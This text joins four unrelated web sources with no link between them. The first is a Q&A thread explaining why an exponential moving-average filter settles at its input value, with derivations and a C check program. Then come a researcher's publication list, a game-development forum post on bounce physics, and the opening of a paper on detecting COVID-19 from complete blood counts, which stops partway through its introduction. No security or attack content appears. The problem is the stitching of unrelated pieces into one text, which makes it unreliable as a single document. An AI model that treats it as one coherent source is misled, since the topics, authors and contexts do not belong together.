If I try some values with a "strong" a coefficient, I can see that it starts with large increments, then becomes smooth, until "rounding" happens and it settles at z = in:
0 | 0.16
1 | 0.288
2 | 0.3904
3 | 0.47232
4 | 0.537856
5 | 0.590285
6 | 0.632228
7 | 0.665782
8 | 0.692626
9 | 0.714101
10 | 0.731281
11 | 0.745024
12 | 0.75602
13 | 0.764816
14 | 0.771853
15 | 0.777482
16 | 0.781986
17 | 0.785588
18 | 0.788471
19 | 0.790777
20 | 0.792621
21 | 0.794097
22 | 0.795278
23 | 0.796222
24 | 0.796978
25 | 0.797582
26 | 0.798066
27 | 0.798453
28 | 0.798762
29 | 0.79901
30 | 0.799208
31 | 0.799366
32 | 0.799493
33 | 0.799594
34 | 0.799675
35 | 0.79974
36 | 0.799792
37 | 0.799834
38 | 0.799867
39 | 0.799894
40 | 0.799915
41 | 0.799932
42 | 0.799946
43 | 0.799956
44 | 0.799965
45 | 0.799972
46 | 0.799978
47 | 0.799982
48 | 0.799986
49 | 0.799989
50 | 0.799991
51 | 0.799993
52 | 0.799994
53 | 0.799995
54 | 0.799996
55 | 0.799997
56 | 0.799998
57 | 0.799998
58 | 0.799998
59 | 0.799999
60 | 0.799999
61 | 0.799999
62 | 0.799999
63 | 0.799999
64 | 0.8
65 | 0.8
66 | 0.8
...
So, basically, each iteration is a sum of 0.16 + prev z * 0.8. And here is what I don't understand: why can't 0.16 + prev z * 0.8 go "over" 0.8?
In fact, this becomes stable when z = in. Without rounding, z will always be < in. Why can't it go > in?
It's a sum on each iteration... what limits it?
• You might want to try to compute the values by hand, drawing them on an axis one by one. Each iteration is computing a weighted mean between the previous result and the input, and with constant input it can be easy to get why you can't cross it. – TonioElGringo Aug 24 '16 at 12:56
In more standard DSP terms, you have the following filter:
$$y[n] = (1-a) x[n] + a y[n-1]$$
where $x[n]$ and $y[n]$ are the input and output signals at time $n$ respectively.
The transfer function (which you didn't ask for) is:
$$H(z) = \frac{1-a}{1 - az^{-1}}$$
so here is your single pole, at $z=a$ in the complex plane. This filter is also known as exponential smoothing, exponential moving average (EMA), or exponentially weighted moving average (EWMA).
The infinite impulse response is $h[n] = (1-a) u[n] a^n$. In layman's terms, when the input signal is 0 except for $x[0]=1$, the output signal is an exponential $(1-a) \times a^n$ starting at $n=0$.
What you want is the step response (i.e. what happens if the input signal is a constant $K$ starting at time $n=0$).
In this case, the output signal is the convolution $h \star Ku$ of the impulse response and the step signal. This is (for time $n \ge 0$):
$$y[n] = \sum_{k=0}^{k=n} K \times h[k] = K(1-a) \sum_{k=0}^{k=n} a^k = K(1-a)\frac{1-a^{n+1}}{1-a} = K (1-a^{n+1})$$
As the time $n$ grows, $a^{n+1}$ vanishes, and the step response grows monotonically to its limit value $y = K$, which is the value of the input signal.
This is what you get in your simulation.
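For readers who want to check the numbers, here is a minimal C sketch. The constants $a=0.8$ and the constant input $K=0.8$ are taken from the question; the 10-sample loop length is arbitrary. It prints the recursive filter output next to the closed-form step response derived above.

```c
#include <stdio.h>
#include <math.h>

int main(void)
{
    const double a = 0.8;        /* pole / smoothing coefficient (from the question) */
    const double b = 1.0 - a;    /* input gain */
    const double K = 0.8;        /* constant ("step") input, as in the question */
    double z = 0.0;              /* filter state, initially zero */

    for (int n = 0; n < 10; n++) {
        z = K * b + z * a;                          /* recursive one-pole filter */
        double closed = K * (1.0 - pow(a, n + 1));  /* closed form K(1 - a^(n+1)) */
        printf("%2d | recursive %.6f | closed form %.6f\n", n, z, closed);
    }
    return 0;
}
```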
• I dared to add a few more common names for this filter, to help find literature. Corrections welcome – Laurent Duval Aug 24 '16 at 11:49
• Beautiful answer ! – Gilles Aug 24 '16 at 12:27
• Thanks for the answer! Well, for step: "This filter is also known as exponential smoothing, exponential moving average (EMA), or exponentially weighted moving average (EWMA)." The formula you have put (y[n] = (1−a)*x[n] + a*y[n−1]) is like my formula, but the one on the wiki is different: its y[n] = a*x[n] + (1-a)*y[n-1]. Why? – markzzz Aug 24 '16 at 12:30
• @markzzz The difference is just in how you name your parameters. In the answer above, the exponent is a. In the wikipedia article notation, the exponent is (1-a_wiki). – Juancho Aug 24 '16 at 12:45
• Right! Thanks! So basically, the formula becomes z = in - (in - z)*a: it subtracts from in an amount that gets smaller at each step, until at some point (due to computer rounding) (in - z)*a becomes 0, so z = in. Is that right? If it weren't for rounding, it really would be an "infinite response", never quite reaching in...! Not sure if that's correct anyway hehehe – markzzz Aug 24 '16 at 12:52
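The reading in that last comment is right. Restating the answer's result in the same "remaining error" form (using the notation above, with zero initial state and a constant input $K>0$):
$$e[n] = K - y[n] = K - \big((1-a)K + a\,y[n-1]\big) = a\,\big(K - y[n-1]\big) = a\,e[n-1],$$
so $e[n] = a^{n+1}K$ and $y[n] = K(1-a^{n+1})$, exactly as derived earlier. For $0 < a < 1$ the error shrinks by a factor of $a$ at every step and never changes sign, so the output approaches the input from below but can never overshoot it; only finite-precision rounding eventually makes the remaining error exactly zero.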
https://www.imperial.ac.uk/people/r.syms/publications.html | # Professor Richard Syms
Faculty of Engineering, Department of Electrical and Electronic Engineering
Professor
### Contact
+44 (0)20 7594 6203 · r.syms
### Location
702 Electrical Engineering, South Kensington Campus
## Publications
362 results found
Syms R, Noorwali A, 2022, Polyphase codes for multiplexed acoustic signalling and sensing on pipes, Smart Materials and Structures, Vol: 31, ISSN: 0964-1726
Transmission of acoustic signals between distributed sensor nodes may be useful for status monitoring of elongated structures such as pipelines. In principle, coded signals can be used in an asynchronous multiplexed system, provided the signals are distinguishable. However, multimode effects complicate signal propagation, so any such codes should be short. A search for polyphase code families with properties suitable for acoustic code division multiple access is presented. Algorithms for reduction of search space to allow use of a laptop for code discovery are described. Short codes of base 6 are shown to outperform codes of bases 2, 3, 4 and sets suitable for systems with 2 and 3 users are identified. The codes have similar properties to Barker codes but larger sidelobes. Their use is demonstrated by simulation and experiment at kHz frequencies using an air-filled copper pipe, an electromagnetic acoustic transducer (EMAT) and a microphone designed to excite and detect the $L\left( {0,1} \right)$ mode. Low loss propagation over 25 m is achieved with a 20 kHz carrier. Excellent agreement between experiment and theory is demonstrated, with performance limited by transducer bandwidth.
Journal article
Voronov A, Syms RRA, Sydoruk O, 2022, High-performance magnetoinductive directional filters, Electronics, Vol: 11, Pages: 1-16, ISSN: 1450-5843
Multiport magnetoinductive (MI) devices with directional filter properties are presented. Design equations are developed and solved using wave analysis and dispersion theory, and it is shown that high-performance directional filters can be realised for use both in MI systems with complex, frequency-dependent impedance and in conventional systems with real impedance. Wave analysis is used to reduce the complexity of circuit equations. High-performance MI structures combining directional and infinite rejection filtering are demonstrated, as well as multiple-passband high-rejection filtering. A new method for improving filtering performance through multipath loss compensation is described. Methods for constructing tuneable devices using toroidal ferrite-cored transformers are proposed and demonstrated, and experimental results for tuneable MI directional filters are shown to agree with theoretical models. Limitations are explored, and power handling sufficient for HF RFID applications is demonstrated, despite the use of ferrite materials.
Journal article
Syms R, Liu D, 2022, Buckling Electrothermal NEMS Actuators: Analytic Design for Very Slender Beams, Micro, Vol: 2, Pages: 54-67
Analytic approximations are presented for the response of buckling-mode electrothermal actuators with very slender beams with a width-to-length ratio of W/L≤0.001 of the type found in nanoelectromechanical systems (NEMS). The results are found as closed-form solutions to the Euler beam bending theory rather than by an iterative numerical solution or a time-consuming finite element analysis. Expressions for transverse deflections and stiffness are presented for actuators with the common raised cosine and chevron pre-buckled shapes. The approximations are valid when the effects of bending dominate over those of axial compression. A few higher-order approximations are also presented for less slender beams with 0.001≤W/L≤0.01.
Journal article
Syms RRA, Voronov A, Sydoruk O, 2022, HF RFID Tag Location Using Magneto-Inductive Waves, IEEE JOURNAL OF RADIO FREQUENCY IDENTIFICATION, Vol: 6, Pages: 347-354
Journal article
Syms R, Bouchaala A, 2021, Mechanical Synchronization of MEMS Electrostatically Driven Coupled Beam Filters, MICROMACHINES, Vol: 12
Journal article
Syms R, Sydoruk O, Wiltshire M, 2021, Magneto-inductive HF RFID system, International Journal of Radio Frequency Identification Technology and Applications, Vol: 5, Pages: 148-153, ISSN: 1745-3216
Efforts to increase read range in passive HF RFID systems are hampered by the poor range scaling law of inductive coupling. An alternative approach to enlarging capture volume—increasing the lateral extent of the antenna—is proposed, using a magneto-inductive (MI) travelling wave arrangement to allow larger antenna sizes. A theory of load modulation in MI systems is first presented, together with field simulations in the capture volume. A 2.3 metre-long MI antenna is then constructed, and an active tag emulator is used to demonstrate load modulation. RFID is then demonstrated, with the antenna in both reflection and transmission modes, using a custom reader constructed from laboratory equipment. A transverse read range of 0.5 m is obtained using commercial off-the-shelf RFID cards with 12 W RF power, with high uniformity along the length of the antenna.
Journal article
Voronov A, Sydoruk O, Syms RRA, 2021, Power waves and scattering parameters in magneto-inductive systems, AIP ADVANCES, Vol: 11
Journal article
Wright S, Syms R, 2021, Shock-free ion transmission in a skimmer-based MEMS mass spectrometer vacuum interface, Journal of Micromechanics and Microengineering, Vol: 31, ISSN: 0960-1317
Shock-free ion transmission from atmospheric pressure to a MEMS-based mass spectrometer has been achieved using micro-engineered nickel skimmers. The signal level has increased 70-fold compared with a previous configuration in which the skimmer did not sample the supersonic flow. The skimmers are formed by electroplating internal surfaces of anisotropically etched, pyramidal holes in (100) silicon. Etching from the reverse of the wafer exposes free-standing, open-ended skimmers supported by remaining silicon. High-resolution schlieren imaging has been used to visualise gas flow within the interface. Signal enhancement and increased gas throughput are observed when the skimmer attaches to the supersonic gas expansion via oblique shocks. The silicon back wall interacts with the flow field, causing the free jet Mach disc to evolve into a bowl-shaped surface shock whose position asymptotically approaches a stand-off separation as the interface pressure decreases. Ideally, the skimmer entrance should be located approximately midway between the inlet and the back wall. This development should allow a sensitivity increase in MEMS mass spectrometers using pumps of moderate capacity.
Journal article
Bouchaala A, Syms R, 2020, New architectures for micromechanical coupled beam array filters, Microsystem Technologies: micro and nanosystems information storage and processing systems, Vol: 27, Pages: 3377-3387, ISSN: 0946-7076
Coupled resonator filters implemented as microelectromechanical systems (MEMS) offer performance advantages as band-pass filters at MHz frequencies. Here new designs based on resonant cavities for acoustic slow waves are developed to allow alternative frequency responses. Derivation of the lumped element model for coupled beam systems with in-plane motion from Rayleigh–Ritz perturbation theory is first reviewed. Departures from ideal behaviour caused by mechanical and electrostatic detuning are resolved. Slow wave theory is then used to develop linear array topologies with novel responses including band-stop and comb filtering with controlled filter roll-off. A systematic procedure is developed to allow rapid identification of design parameters without the need for lengthy numerical simulation, using the lumped element, stiffness matrix and finite element methods to investigate the layout parameters of initial design concepts, detailed mechanical effects and detailed electrostatic effects, respectively. High performance is demonstrated, with good agreement between the models.
Journal article
Syms R, Khuntikeo N, Titapun A, Chamadol N, Boonphongsathien W, Sa-Ngiamwibool P, Taylor-Robinson S, Wadsworth C, Zhang S, Kardoulaki E et al., 2020, In vitro intraductal MRI and T2 mapping of cholangiocarcinoma using catheter coils, Hepatic Medicine: Evidence and Research, Vol: 2020, Pages: 107-114, ISSN: 1179-1535
Aim: Diagnostic imaging of early-stage cholangiocarcinoma is challenging. A previous in vitro study of fixed-tissue liver resection specimens investigated T2 mapping as a method of exploiting the locally increased signal-to-noise ratio (SNR) of duodenoscope coils for improved quantitative magnetic resonance imaging (MRI), despite their non-uniform sensitivity. This work applies similar methods to unfixed liver specimens using catheter-based receivers.Methods: Ex vivo intraductal MRI and T2 mapping were carried out at 3T on unfixed resection specimens obtained from cholangiocarcinoma patients immediately after surgery using a catheter coil based on a thin-film magneto-inductive waveguide, inserted directly into an intrahepatic duct.Results: Polypoid intraductal cholangiocarcinoma was imaged using fast spin echo sequences. High resolution T2 maps were extracted by fitting of data obtained at different echo times to mono-exponential models, and disease-induced changes were correlated with histopathology. An increase in T2 was found compared with fixed specimens and differences in T2 allowed the resolution of tumour tissue and malignant features such as polypoid morphology.Conclusions: Despite their limited field of view, useful data can be obtained using catheter coils, and T2 mapping offers an effective method of exploiting their local SNR advantage without the need for image correction.
Journal article
Khuntikeo N, Titapun A, Chamadol N, Boonphongsathien W, Sa-Ngiamwibool P, Taylor-Robinson SD, Wadsworth CA, Zhang S, Kardoulaki EM, Young IR, Syms RR et al., 2020, Improving the detection of cholangiocarcinoma: in vitro MRI-based study using local coils and T2 mapping, Hepatic Medicine: Evidence and Research, Vol: 12, Pages: 29-39, ISSN: 1179-1535
Aim: Cholangiocarcinoma is endemic in southeast Asia, generally developing from liver fluke infestation. However, diagnostic imaging of early-stage disease is challenging. The aim of this work is to investigate relaxometry (specifically, T2 mapping) as a method of exploiting the higher signal-to-noise ratio (SNR) of internal coils for improved reception of magnetic resonance signals, despite their non-uniform sensitivity.Methods: Ex vivo T2 mapping was carried out at 3T on fixed resection specimens from Thai cholangiocarcinoma patients using an mGRASE sequence and an endoscope coil based on a thin-film magneto-inductive waveguide and designed ultimately for internal use.Results: Disease-induced changes including granulomatous inflammation, intraepithelial neoplasia and intraductal tumours were correlated with histopathology, and relaxation data were compared with mono- and bi-exponential models of T2 relaxation. An approximately 10-fold local advantage in SNR compared to a 16-element torso coil was demonstrated using the endoscope coil, and improved tissue differentiation was obtained without contrast agents.Conclusion: The performance advantage above follows directly from the inverse relation between the component of the standard deviation of T2 due to thermal noise and the SNR, and offers an effective method of exploiting the SNR advantage of internal coils. No correction is required, avoiding the need for tracking, relaxing constraints on coil and slice orientation and providing rapid visualization.
Journal article
Alsaleh M, Barbera TA, Andrews RH, Sithithaworn P, Khuntikeo N, Loilome W, Yongvanit P, Cox IJ, Syms RRA, Holmes E, Taylor-Robinson SD et al., 2019, Mass spectrometry: A guide for the clinician, Journal of Clinical and Experimental Hepatology, Vol: 9, Pages: 597-606, ISSN: 0973-6883
Metabolic profiling, metabonomics and metabolomics are terms coined in the late 1990s as they emerged as the newest ‘omics’ technology at the time. This line of research enquiry uses spectroscopic analytical platforms, which are mainly nuclear magnetic resonance spectroscopy and mass spectrometry (MS), to acquire a snapshot of metabolites, the end products of a complex biological system. Metabolic profiling enables the detection, quantification and characterisation of metabolites in biofluids, cells and tissues. The source of these compounds can be of endogenous, microbial or exogenous origin, such as dietary or xenobiotic. This results in generating extensive, multivariate spectroscopic data that require specific statistical manipulation, typically performed using chemometric and pattern recognition techniques to reduce its dimensions, facilitate its biological interpretation and allow sample classification and biomarker discovery. Consequently, it is possible to study the dynamic metabolic changes in response to disease, intervention or environmental conditions. In this review, we describe the fundamentals of MS so that clinicians can be literate in the field and are able to interrogate the right scientific questions.
Journal article
Syms RRA, Sydoruk O, Bouchaala A, 2019, Improved optical imaging of high aspect ratio nanostructures using dark-field microscopy, Nanotechnology, Vol: 30, ISSN: 0957-4484
Improvements to white light optical imaging of widely spaced, high aspect ratio nanostructures are demonstrated using dark-field microscopy. 1D models of bright- and dark-field imaging are developed from rigorous modal diffraction theory by assuming that features are periodic. A simple model is developed to explain dark field results and simulated line images obtained using the two modalities are compared for different dimensions and materials. Increased contrast between etched features and the substrate is demonstrated in dark field, due to its reduced sensitivity to scattering from flat areas. The results are verified using silicon nanostructures fabricated by sidewall transfer lithography, and feature separation with improved tolerance to apparent substrate brightness is demonstrated during image segmentation using the Otsu method.
Journal article
Alsaleh M, Leftley Z, Barbera T, Sithithaworn P, Khuntikeo N, Loilome W, Yongvanit P, Cox IJ, Chamadol N, Syms R, Andrews R, Taylor-Robinson S et al., 2018, Cholangiocarcinoma: a guide for the nonspecialist, International Journal of General Medicine, Vol: 12, Pages: 13-23, ISSN: 1178-7074
Cholangiocarcinoma (CCA) is a tumor with increasing prevalence around the world. The prevalence of CCA is highest in East Asia and most significantly in the countries through which the Mekong River flows, owing to the presence of liver flukes, which are consumed in raw fish dishes. Outside Asia, the causes of bile duct cancers for the most part are unknown. In this review, we assess the current state of knowledge in both fluke-associated and sporadic CCA, from etiological, diagnostic, and treatment perspectives.
Journal article
Syms RRA, Bouchaala A, Sydoruk O, Liu D et al., 2018, Optical imaging and image analysis for high aspect ratio NEMS, Journal of Micromechanics and Microengineering, Vol: 29, ISSN: 0960-1317
A strategy for optical microscopy of high-aspect-ratio (HAR) nanoelectromechanical systems (NEMS) that combine large feature spacing and large height with sub-wavelength width is presented. Line images are simulated using a 2D model of incoherent imaging based on modal diffraction theory. Beyond a sufficient depth, it is shown that sub-wavelength features appear as dark lines, while wider features are visible as their edges. The results suggest NEMS and MEMS may be separated from background in images by detection of valleys in brightness. Results are confirmed by imaging of Si NEMS containing 100 nm wide features in a bright-field microscope. Algorithms for separation of NEMS, MEMS and background in microscope images based on valley detection, thresholding and masking are demonstrated.
Journal article
Wright S, Syms RRA, 2018, Supersonic jet interactions with a micro-engineered skimmer, Journal of Micromechanics and Microengineering, Vol: 28, ISSN: 0960-1317
A micro-engineered, skimmer-based vacuum interface has been demonstrated and used to investigate gas dynamics on a sub-millimeter length scale. The interface is fabricated as a stacked assembly of silicon dies, based on an anisotropically etched inlet orifice and a pyramidal skimmer cone formed in electroplated nickel. Expansion of gas into vacuum, interaction of a supersonic jet with the skimmer and transmission of a collimated beam into a second vacuum stage have all been imaged with a schlieren microscope. Using a glass-walled vacuum chamber, flow patterns upstream and fully downstream of the skimmer have been imaged together for the first time. At low first-stage pressures, the 150–200 µm tall skimmers cannot fully penetrate the shock arising from interaction of the jet with the back wall. However, as the pressure is increased, a multiple shock cell structure evolves, the jet narrows and transmission rises sharply. Eventually, a collimated beam is transmitted to the second stage. When the skimmer aperture is smaller than the source aperture, a series of distinct peaks is evident in a plot of transmission against first-stage pressure. Imaging shows that at each successive peak, the number of shock cells increases by one and the skimmer inlet is coincident with a node.
Journal article
Wiltshire MCK, Syms RRA, 2018, Measuring noise in microwave metamaterials, JOURNAL OF APPLIED PHYSICS, Vol: 123, ISSN: 0021-8979
Electromagnetic metamaterials are artificially constructed media composed of arrays of electrical circuits that can exhibit electric and magnetic characteristics unlike those of any conventional materials. However, the materials are lossy and hence noisy, so that the signal-to-noise ratio in practical situations is greatly reduced. In particular, operating in the double negative region, where both the permittivity and the permeability are negative so that the refractive index is real but negative, incurs significant loss and noise penalties. In this work, we report noise measurements on a double negative metamaterial at microwave frequencies and compare them with the results of a simple model based on a transmission line loaded with lossy elements that mimic the split ring resonators and fine wires of the metamaterial. A noise source is associated with the resistive part of each element, and these are added incoherently to predict the total noise spectrum of the metamaterial. The theoretical results are in good agreement with the measurements. In particular, we find that the measured noise spectrum has contributions from both electric and magnetic noise, but is dominated by the magnetic noise. This limits possible applications, even with optimised materials, to functions that cannot be realised by conventional means.
Journal article
Kamel H, Syms RRA, Kardoulaki EM, Rea M et al., 2018, Surgical wound monitoring by MRI with a metamaterial-based implanted local coil, EPJ Applied Metamaterials, Vol: 5, ISSN: 2272-2394
An implantable sensor for monitoring surgical wounds after bowel reconstruction is proposed. The sensor consists of a coupled pair of 8-element magneto-inductive ring resonators, designed for mounting on a biofragmentable anastomosis ring to give a local increase in signal-to-noise ratio near an annular wound during 1H magnetic resonance imaging. Operation on an anti-symmetric spatial mode is used to avoid coupling to the B1 field during excitation, and a single wired connection is used for MRI signal output. The electrical response and field-of-view are estimated theoretically. Prototypes are constructed from flexible elements designed for operation at 1.5 T, electrical responses are characterized and local SNR enhancement is confirmed using agar gel phantoms.
Journal article
Syms RRA, Kardoulaki E, Rea M, Choonee K, Taylor-Robinson S, Wadsworth C, Young IR et al., 2017, Magneto-inductive magnetic resonance imaging duodenoscope, Progress in Electromagnetics Research (PIER), Vol: 159, Pages: 125-138, ISSN: 1070-4698
A magnetic resonance imaging (MRI) duodenoscope is demonstrated, by combining non-magnetic endoscope components with a thin-film receiver based on a magneto-inductive waveguide. The waveguide elements consist of figure-of-eight shaped inductors formed on either side of a flexible substrate and parallel plate capacitors that use the substrate as a dielectric. Operation is simulated using equivalent circuit models and by computation of two- and three-dimensional sensitivity patterns. Circuits are fabricated for operation at 127.7 MHz by double-sided patterning of copper-clad Kapton and assembled onto non-magnetic flexible endoscope insertion tubes. Operation is verified by bench testing and by 1H MRI at 3T using phantoms. The receiver can form a segmented coaxial image along the length of the endoscope, even when bent, and shows a signal-to-noise-ratio advantage over a surface array coil up to three times the tube diameter at the tip. Initial immersion imaging experiments have been carried out and confirm an encouraging lack of sensitivity to RF heating.
Journal article
Syms RRA, Kardoulaki E, Rea M, Taylor-Robinson S, Wadsworth C, Young IR et al., 2017, Metamaterial Magnetic Resonance Imaging Endoscope, 2017 11th International Congress on Engineered Material Platforms for Novel Wave Phenomena (METAMATERIALS), Publisher: IEEE, Pages: 337-339
Conference paper
Kamel H, Syms R, Kardoulaki EM, Rea M et al., 2017, Metamaterial MRI-based Surgical Wound Monitor, 2017 11th International Congress on Engineered Material Platforms for Novel Wave Phenomena (METAMATERIALS), Publisher: IEEE, Pages: 334-336
Conference paper
Syms R, 2017, Rapid evaporation-driven chemical pre-concentration and separation on paper., Biomicrofluidics, Vol: 11, ISSN: 1932-1058
Airflow-enhanced evaporation is investigated as a method for rapid chemical preconcentration on a thin porous substrate. The mechanism is described by combining 1D models of capillary rise, chromatography, and pervaporation concentration. It is shown that the effective length of the column can be shorter than its actual length, allowing concentrate to be held at a stagnation point and then released for separation, and that the Péclet number, which determines the concentration performance, is determined only by the substrate properties. The differential equations are solved dynamically, and it is shown that faster concentration can be achieved during capillary filling. Experiments are carried out using chromatography paper in a ducted airflow, and concentration is quantified by optical imaging of water-soluble food dyes. Good agreement with the model is obtained, and concentration factors of ≈100 are achieved in 10 min using Brilliant Blue FCF. Partial separation of Brilliant Blue from Tartrazine is demonstrated immediately following concentration, on a single unpatterned substrate. The mechanism may provide a method for improving the sensitivity of lab-on-paper devices.
Journal article
Syms RRA, Liu D, Ahmad MM, 2017, Nanostructured 2D cellular materials in silicon by sidewall transfer lithography NEMS, Journal of Micromechanics and Microengineering, Vol: 27, ISSN: 0960-1317
Sidewall transfer lithography (STL) is demonstrated as a method for parallel fabrication of 2D nanostructured cellular solids in single-crystal silicon. The linear mechanical properties of four lattices (perfect and defected diamond; singly and doubly periodic honeycomb) with low effective Young's moduli and effective Poisson's ratio ranging from positive to negative are modelled using analytic theory and the matrix stiffness method with an emphasis on boundary effects. The lattices are fabricated with a minimum feature size of 100 nm and an aspect ratio of 40:1 using single- and double-level STL and deep reactive ion etching of bonded silicon-on-insulator. Nanoelectromechanical systems (NEMS) containing cellular materials are used to demonstrate stretching, bending and brittle fracture. Predicted edge effects are observed, theoretical values of Poisson's ratio are verified and failure patterns are described.
Journal article
Syms RRA, Floume T, 2017, Parasitic coupling in magneto-inductive cable, Journal of Physics D: Applied Physics, Vol: 50, ISSN: 0022-3727
Magneto-inductive (MI) waveguides are linear arrangements of magnetically coupled L–C resonators that propagate electrical energy at radio frequency without direct connection. To achieve the strong magnetic coupling needed for low-loss propagation, adjacent elements must be in such close proximity that electric coupling arises. In contrast to electric coupling in split ring resonators, the coupling occurs between the inductive tracks of adjacent resonant loops. Parasitic capacitance is demonstrated in flexible magneto-inductive cable, and shown to introduce additional propagation bands above the MI band. Simple models are developed to predict this effect, and strategies discussed to improve high-frequency isolation.
Journal article
Kardoulaki EM, Syms RRA, Young IR, 2016, MRI for noninvasive thermometry, eMagRes, Vol: 5, Pages: 1203-1217, ISSN: 2055-6101
MRI was recognized for its potential use as a noninvasive in vivo thermometer 30 years ago. Today, the most popular application of MR thermometry is the guidance of thermal therapies for the treatment of cancer and other pathologies. These minimally invasive operations are routinely performed on patients who are not eligible for surgery in approximately 40 medical centers globally. The aim is to deliver or abduct thermal energy in order to cause local tissue necrosis or to sensitize a lesion to chemotherapy or radiotherapy without causing harm to the surrounding healthy tissue. Here we explain the principles of operation of MR thermometry and provide a critical review of the proposed methods, highlighting remaining fundamental and technical issues as well as recent progress. Emphasis is placed on hardware advances (RF receivers) for improved signal-to-noise ratio (SNR) which would lead to better accuracy, spatiotemporal resolution, and precise calibration. We conclude with a general outlook for the field.
Journal article
Kardoulaki EM, Syms RRA, Young IR, Rea M et al., 2016, SNR in MI catheter receivers for MRI, IEEE Sensors Journal, Vol: 16, Pages: 1700-1707, ISSN: 1530-437X
Internal coils have a signal-to-noise ratio (SNR) advantage during magnetic resonance imaging. However, coils with continuous cables are generally unsafe, due to the risk of RF heating. Segmented cables, such as magneto-inductive waveguides, should introduce inherent safety at the price of increased noise, from both the cable and the body. Here, we derive analytical SNR expressions for both types of noise, develop a model to compare the SNR of different types of receiver, and validate the model with data from imaging experiments at 3T. Experiments and theory confirm that body noise does not prevent an SNR gain compared with an eight-element external coil, even when a long section of waveguide is loaded with tissue.
Journal article
Syms R, Wright S, 2016, MEMS Mass Spectrometers: the Next Wave of Miniaturization, Journal of Micromechanics and Microengineering, Vol: 26, ISSN: 1361-6439
This paper reviews mass spectrometers based on micro-electro-mechanical systems (MEMS) technology. The MEMS approach to integration is first briefly described, and the difficulties of miniaturizing mass spectrometers are outlined. MEMS components for ionization and mass filtering are then reviewed, together with additional components for ion detection, vacuum pressure measurement and pumping. Mass spectrometer systems containing MEMS sub-components are then described, applications for miniaturized and portable systems are discussed, and challenges and opportunities are presented.
Journal article
Syms R, Solymar L, 2015, A dynamic competition model of regime change, Journal of the Operational Research Society, Vol: 66, Pages: 1939-1947, ISSN: 1476-9360
A dynamic competition model for an oppressive government opposed by rebels is proposed, based on coupled differential equations with constant coefficients. Depending on their values, the model allows scenarios representing a stable, oppressive government and violent regime change. With constant coefficients, there can be no limit cycles. However, cycles emerge if rebels and governments switch characteristics after a revolution, if resources change hands and rebel motivations switch from grievance to greed. This mechanism is proposed as an explanation for the establishment of a new repressive regime after the overthrow of a similar regime.
Journal article
Mokhtar MHH, Syms RRA, 2015, Tailored fibre waveguides for precise two-axis Lissajous scanning, Optics Express, Vol: 23, Pages: 20804-20811, ISSN: 1094-4087
A two-axis optical imaging system using a Lissajous scan pattern with non-integer frequency ratio is presented. A waveguide with precisely tuned mechanical resonant frequencies is constructed by dip coating two fibres with a transparent polymer. Motion is achieved by mounting a waveguide cantilever at 45° on a single piezoelectric actuator with a dual-frequency drive. Confocal signal collection is achieved using a mode-stripping detector, and feedback signals needed for frequency and phase locking are derived from intermittent reflection from an apertured mirror. The first scan axis is locked to the resonance of one of the modes, while the second scan axis is locked to the correct phase at the desired frequency ratio. Accurate acquisition of two-dimensional images is demonstrated.
Journal article
Kardoulaki EM, Syms RRA, Young IR, Rea M, Gedroyc WMW et al., 2015, Thin-film micro-coil detectors: Application in MR-thermometry, Sensors and Actuators A: Physical, Vol: 226, Pages: 48-58, ISSN: 1873-3069
Journal article
http://www.gamedev.net/index.php?app=forums&module=extras&section=postHistory&pid=4935326
### #Actual (dabo)
Posted 27 April 2012 - 02:44 AM
I have looked around a bit more and I've seen examples of implementations where only the vertical component of the velocity vector is affected by the coefficient of restitution; the horizontal component is only affected by friction. Is this correct? If so my code above is incorrect and it would explain why my puck slows down so much horizontally when it bounces. But I am not sure the angle of the bounce is correct if only the vertical component is affected by COR. Could anyone clarify this please?
The last line above would be this instead:
velocity.Y = 0.267 * velocity.Y;
### #1 (dabo)
Posted 27 April 2012 - 02:43 AM
I have looked around a bit more and it seems in some implementations only the vertical component of the velocity vector is affected by the coefficient of restitution; the horizontal component is only affected by friction. Is this correct? If so my code above is incorrect and it would explain why my puck slows down so much horizontally when it bounces. But I am not sure the angle of the bounce is correct if only the vertical component is affected by COR. Could anyone clarify this please?
The last line above would be this instead:
velocity.Y = 0.267 * velocity.Y;
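For illustration only, here is a small C sketch of the convention described above for a puck bouncing on a horizontal floor: the vertical (normal) component is reflected and scaled by the coefficient of restitution, while the horizontal (tangential) component is scaled by friction. The 0.267 value comes from the post; the friction factor, the y-up sign convention, and whether your engine already flips the vertical velocity somewhere else are assumptions to check against your own code.

```c
/* Bounce response against a horizontal floor (sketch; y-up convention assumed). */
typedef struct { double x, y; } Vec2;

void resolve_floor_bounce(Vec2 *velocity, double restitution, double friction)
{
    if (velocity->y < 0.0) {                      /* moving down into the floor    */
        velocity->y = -restitution * velocity->y; /* reflect and scale, e.g. 0.267 */
        velocity->x *= friction;                  /* tangential loss, e.g. 0.98    */
    }
}
```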
https://www.nature.com/articles/s43856-022-00129-0 | ## Introduction
At the end of 2019, the Severe Acute Respiratory Syndrome Coronavirus 2 (SARS-Cov-2) appeared in the city of Wuhan, China1, which led to a global outbreak weeks later2. This highly transmissible novel Coronavirus disease was named Coronavirus disease 2019 (COVID-19)3. At the time this article is being written, over 400 million cases of COVID-19 infections and over 5.7 million deaths have already been reported worldwide. One of the main challenges for its diagnosis is the list of initial symptoms: fever, dry cough and/or tiredness4, which are all common in many other respiratory diseases.
Currently, the gold-standard tests for direct SARS-Cov-2 detection include the Reverse Transcription Polymerase Chain Reaction exam (or simply, RT-PCR) and serology analysis. The first step of the RT-PCR exam is to use the enzyme reverse transcriptase to transform the RNA of the virus into complementary DNA. RNA is produced from a DNA molecule and carries the information needed to coordinate the production of proteins. With a probe complementary to a particular virus, it is possible to verify whether the molecular content corresponds to that of the suspected infectious agent. For SARS-Cov-2 in particular, however, RT-PCR is most efficient at the peak of the infectious cycle5. This leads to high false-negative occurrences, with a sensitivity rate of between 50% and 62% according to6,7. The authors of ref. 8 verified that over 20% of infected individuals obtained a positive RT-PCR result only after two consecutive false-negative results. Serology exams have been found to reach sensitivity and specificity rates of 0.95+ but only after 15–28 days of symptom onset9. Furthermore, both exams are relatively expensive, and results take longer to process when compared with other kinds of laboratory tests, such as the complete blood count.
Complete blood counts (CBCs) are extensively used for general individual diagnosis10. As a low-cost test that measures analyte levels of the white and red blood cell series, the CBC is a useful tool to support medical decisions, as intrinsic variations in analytes can bring relevant insights regarding potential diseases. Patients with most kinds of infectious diseases show noticeable changes in their CBC tests. However, proving that these results are sufficient to support a particular diagnosis is a considerably more difficult task, as changes in analyte values can easily be confounded with the patterns of different diseases.
